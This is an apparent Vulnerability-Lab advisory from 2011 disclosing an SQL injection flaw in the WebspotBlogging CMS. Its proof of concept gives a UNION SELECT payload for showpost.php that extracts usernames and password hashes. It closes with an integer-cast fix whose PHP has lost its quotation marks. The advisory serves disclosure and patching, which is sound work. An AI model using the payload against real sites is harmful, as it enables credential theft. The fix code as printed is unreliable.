WebspotBlogging v3.02.x - SQL Injection Vulnerability

Document Title:
===============
WebspotBlogging v3.02.x - SQL Injection Vulnerability



Release Date:
=============
2011-06-14


Vulnerability Laboratory ID (VL-ID):
====================================
90


Product & Service Introduction:
===============================
Here are just some of the features of WebspotBlogging:

    * Expertly designed UI for easy navigation and reading
    * User accounts to keep your blog secure
    * User permissions (Admin, Mod, Member)
    * Comments, so that you know what your readers think of your post
    * Simple to use admin and posting panel for easy customisation and posting
    * Newsletter system to send updates to all of the members that wish to revieve them
    * Theme Manager to make your blog look the way you want it to
    * Version check so that you know if there have been any new updates to WebspotBlogging
    * RSS Syndication feed so that your visitors can be easily updated when you post
    * Archives so that your readers can browse through all the posts written
    * Quick installation through the simple to use installation script
    * Post Images to make your posts look good

Convinced to download yet? Go on! It won t do any harm! 

Copy of the Vendors Homepage http://blogging.webspot.co.uk/


Abstract Advisory Information:
==============================
An anonymous researcher discovered a critical SQL-Injection Vulnerability in WebspotBlogging.
A remote attacker is able to execute own sql statements and gather User Data, which include Password-Hashes.



Vulnerability Disclosure Timeline:
==================================
N/A


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A sql injection vulnerability is detected on WebspotBlogging open source CMS. 
The vulnerability allows an attacker to infiltrate & compromise the web-application dbms.

Vulnerable Module(s):
                                                       [+] Show Posts


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

Path     : 	http://www.server.com/storefolder/***
File     : 	showpost.php
Para     : 	?id=
Input    : \' 	UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 from users order by \'

http://127.0.0.1/webspot/showpost.php?id=%27%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6,7,8,9,10%20from%20users%20order%20by%20%27


Solution - Fix & Patch:
=======================
Use typecasts to work secure.

Change Line 21 in showpost.php from:
$sql = SELECT * FROM blog WHERE pid = .$_GET[id].;;
to
$sql = SELECT * FROM blog WHERE pid = .(int)$_GET[id].;;


Security Risk:
==============
The security risk of the sql injection vulnerability is estimated as high.


Credits & Authors:
==================
N/A - Anonymous


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory